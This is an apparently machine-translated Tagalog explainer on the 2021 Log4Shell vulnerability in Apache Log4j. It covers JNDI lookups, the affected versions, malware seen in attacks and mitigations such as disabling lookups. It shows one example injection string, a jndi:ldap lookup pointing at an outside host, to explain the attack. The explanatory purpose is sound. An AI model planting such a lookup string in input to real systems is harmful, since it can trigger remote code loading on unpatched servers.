Talaan ng nilalaman[Tago][Ipakita]
Noong huling bahagi ng Nobyembre 2021, natuklasan namin ang isang malaking banta sa cybersecurity. Ang pagsasamantalang ito ay maaaring makaapekto sa milyun-milyong sistema ng kompyuter sa buong mundo.
Ito ay isang gabay sa kahinaan ng Log4j at kung paano ang isang hindi napapansing depekto sa disenyo ay nag-iwan ng higit sa 90% ng mga serbisyo ng computer sa mundo na bukas sa pag-atake.
Ang Apache Log4j ay isang open-source Java-based logging utility na binuo ng Apache Software Foundation. Orihinal na isinulat ni Ceki Gülcü noong 2001, bahagi na ito ng Apache Logging Services, isang proyekto ng Apache Software Foundation.
Ginagamit ng mga kumpanya sa buong mundo ang Log4j library upang paganahin ang pag-log sa kanilang mga application. Sa katunayan, ang Java library ay nasa lahat ng dako, mahahanap mo ito sa mga application mula sa Amazon, Microsoft, Google, at higit pa.
Ang katanyagan ng library ay nangangahulugan na ang anumang potensyal na depekto sa code ay maaaring mag-iwan ng milyun-milyong mga computer na bukas sa pag-hack. Noong ika-24 ng Nobyembre 2021, a seguridad ng ulap Natuklasan ng mananaliksik na nagtatrabaho para sa Alibaba ang isang kakila-kilabot na depekto.
Ang kahinaan ng Log4j, na kilala rin bilang Log4Shell, ay umiral nang hindi napapansin mula noong 2013. Ang kahinaan ay nagbigay-daan sa mga malisyosong aktor na magpatakbo ng code sa mga apektadong system na nagpapatakbo ng Log4j. Inihayag ito sa publiko noong ika-9 ng Disyembre, 2021
Tinatawag ng mga eksperto sa industriya ang Log4Shell flaw na pinakamalaking kahinaan sa kamakailang memorya.
Sa linggo kasunod ng paglalathala ng kahinaan, natukoy ng mga cybersecurity team ang milyun-milyong pag-atake. Ang ilang mga mananaliksik ay naobserbahan pa nga ang isang rate ng higit sa isang daang pag-atake kada minuto.
Paano ito gumagana?
Upang maunawaan kung bakit lubhang mapanganib ang Log4Shell, kailangan nating maunawaan kung ano ang kaya nito.
Ang kahinaan ng Log4Shell ay nagbibigay-daan para sa arbitrary na pagpapatupad ng code, na karaniwang nangangahulugan na ang isang umaatake ay maaaring magpatakbo ng anumang command o code sa isang target na makina.
Paano nito naisasagawa ito?
Una, kailangan nating maunawaan kung ano ang JNDI.
Ang Java Naming and Directory Interface (JNDI) ay isang serbisyo ng Java na nagpapahintulot sa mga programa ng Java na tumuklas at maghanap ng data at mga mapagkukunan sa pamamagitan ng isang pangalan. Ang mga serbisyo ng direktoryo na ito ay mahalaga dahil nagbibigay ang mga ito ng isang organisadong hanay ng mga talaan para madaling matukoy ng mga developer kapag gumagawa ng mga application.
Ang JNDI ay maaaring gumamit ng iba't ibang mga protocol upang ma-access ang isang partikular na direktoryo. Ang isa sa mga protocol na ito ay ang Lightweight Directory Access Protocol, o LDAP.
Kapag nagla-log ng isang string, log4j nagsasagawa ng mga pagpapalit ng string kapag nakatagpo sila ng mga expression ng form ${prefix:name}
.
Halimbawa, Text: ${java:version}
maaaring mai-log bilang Text: Java version 1.8.0_65. Ang mga ganitong uri ng pagpapalit ay karaniwan.
Maaari din tayong magkaroon ng mga ekspresyon tulad ng Text: ${jndi:ldap://example.com/file}
na gumagamit ng JNDI system para mag-load ng Java object mula sa isang URL sa pamamagitan ng LDAP protocol.
Ito ay epektibong naglo-load ng data na nagmumula sa URL na iyon sa makina. Ang sinumang potensyal na hacker ay maaaring mag-host ng malisyosong code sa isang pampublikong URL at maghintay para sa mga makina na gumagamit ng Log4j na i-log ito.
Dahil ang mga nilalaman ng mga mensahe ng log ay naglalaman ng data na kinokontrol ng user, maaaring ipasok ng mga hacker ang sarili nilang mga JNDI reference na tumuturo sa mga LDAP server na kinokontrol nila. Ang mga LDAP server na ito ay maaaring puno ng mga nakakahamak na bagay sa Java na maaaring isagawa ng JNDI sa pamamagitan ng kahinaan.
Ang nagpapalala nito ay hindi mahalaga kung ang application ay isang server-side o isang client-side na application.
Hangga't may paraan para mabasa ng logger ang malisyosong code ng umaatake, bukas pa rin ang application sa mga pagsasamantala.
Sino ang apektado?
Ang kahinaan ay nakakaapekto sa lahat ng system at serbisyo na gumagamit ng APache Log4j, na may mga bersyon 2.0 hanggang sa at kabilang ang 2.14.1.
Maraming mga eksperto sa seguridad ang nagpapayo na ang kahinaan ay maaaring makaapekto sa ilang mga application gamit ang Java.
Ang kapintasan ay unang natuklasan sa Minecraft video game na pag-aari ng Microsoft. Hinimok ng Microsoft ang kanilang mga user na i-upgrade ang kanilang Java edition Minecraft software upang maiwasan ang anumang panganib.
Sinabi ni Jen Easterly, ang Direktor ng Cybersecurity and Infrastructure Security Agency (CISA) na ang mga vendor ay may pangunahing responsibilidad upang maiwasan ang mga end user mula sa mga malisyosong aktor na nagsasamantala sa kahinaang ito.
"Dapat ding nakikipag-ugnayan ang mga vendor sa kanilang mga customer upang matiyak na alam ng mga end-user na ang kanilang produkto ay naglalaman ng kahinaang ito at dapat na unahin ang mga update sa software."
Ang mga pag-atake ay naiulat na nagsimula na. Ang Symantec, isang kumpanyang nagbibigay ng cybersecurity software, ay nakakita ng iba't ibang bilang ng mga kahilingan sa pag-atake.
Narito ang ilang halimbawa ng mga uri ng pag-atake na nakita ng mga mananaliksik:
- botnets
Ang mga botnet ay isang network ng mga computer na nasa ilalim ng kontrol ng iisang umaatakeng partido. Tumutulong sila sa pagsasagawa ng mga pag-atake ng DDoS, pagnanakaw ng data, at iba pang mga scam. Naobserbahan ng mga mananaliksik ang Muhstik botnet sa mga shell script na na-download mula sa Log4j exploit.
- Xmrig Miner Trojan
Ang XMRig ay isang open-source na cryptocurrency na minero na gumagamit ng mga CPU para minahan ang Monero token. Maaaring i-install ng mga cybercriminal ang XMRig sa mga device ng mga tao para magamit nila ang kanilang kapangyarihan sa pagproseso nang hindi nila nalalaman.
- Khonsari ransomware
Ang Ransomware ay tumutukoy sa isang uri ng malware na idinisenyo upang i-encrypt ang mga file sa isang computer. Ang mga umaatake ay maaaring humingi ng bayad bilang kapalit ng pagbibigay ng access pabalik sa mga naka-encrypt na file. Natuklasan ng mga mananaliksik ang Khonsari ransomware sa mga pag-atake ng Log4Shell. Tina-target nila ang mga Windows server at ginagamit ang .NET framework.
Ano ang susunod na mangyayari?
Hinuhulaan ng mga eksperto na maaaring tumagal ng mga buwan o marahil kahit na mga taon upang ganap na ayusin ang kaguluhang dulot ng kahinaan ng Log4J.
Ang prosesong ito ay nagsasangkot ng pag-update sa bawat apektadong system na may patched na bersyon. Kahit na ang lahat ng mga sistemang ito ay na-patched, naroon pa rin ang nagbabantang banta ng mga posibleng backdoor na maaaring naidagdag na ng mga hacker sa window na bukas ang mga server para sa pag-atake.
Marami mga solusyon at pagpapagaan umiiral upang maiwasan ang mga application mula sa pagsasamantala ng bug na ito. Ang bagong Log4j na bersyon 2.15.0-rc1 ay nagbago ng iba't ibang mga setting upang mabawasan ang kahinaang ito.
Ang lahat ng mga feature na gumagamit ng JNDI ay idi-disable bilang default at ang mga remote lookup ay pinaghihigpitan din. Ang pag-disable sa feature na lookup sa iyong Log4j setup ay makakatulong na bawasan ang panganib ng mga posibleng pagsasamantala.
Sa labas ng Log4j, kailangan pa rin ng mas malawak na plano para maiwasan ang mga open-source na pagsasamantala.
Mas maaga noong Mayo, ang White House ay naglabas ng isang utos ng nakatataas na naglalayong mapabuti ang pambansang cybersecurity. Kasama dito ang isang probisyon para sa isang software bill ng mga materyales (SBOM) na mahalagang isang pormal na dokumento na naglalaman ng isang listahan ng bawat item na kailangan upang bumuo ng application.
Kabilang dito ang mga bahagi tulad ng open source mga package, dependency, at API na ginagamit para sa pag-unlad. Kahit na ang ideya ng mga SBOM ay nakakatulong para sa transparency, ito ba ay talagang makakatulong sa mamimili?
Ang pag-upgrade ng mga dependency ay maaaring masyadong abala. Maaari lamang piliin ng mga kumpanya na magbayad ng anumang multa kaysa sa panganib na mag-aksaya ng dagdag na oras sa paghahanap ng mga alternatibong pakete. Marahil ang mga SBOM na ito ay magiging kapaki-pakinabang lamang kung ang kanilang saklaw ay limitado pa.
Konklusyon
Ang isyu ng Log4j ay higit pa sa isang teknikal na problema para sa mga organisasyon.
Dapat malaman ng mga pinuno ng negosyo ang mga potensyal na panganib na maaaring mangyari kapag umaasa ang kanilang mga server, produkto, o serbisyo sa code na sila mismo ay hindi nagpapanatili.
Ang pag-asa sa open-source at mga third party na application ay palaging may kaunting panganib. Dapat isaalang-alang ng mga kumpanya ang paggawa ng mga diskarte sa pagpapagaan ng panganib bago lumabas ang mga bagong banta.
Karamihan sa web ay umaasa sa open-source na software na pinapanatili ng libu-libong mga boluntaryo sa buong mundo.
Kung gusto naming panatilihing ligtas na lugar ang web, dapat mamuhunan ang mga pamahalaan at korporasyon sa pagpopondo sa mga open source na pagsisikap at mga ahensya ng cybersecurity tulad ng Cisa.
Mag-iwan ng Sagot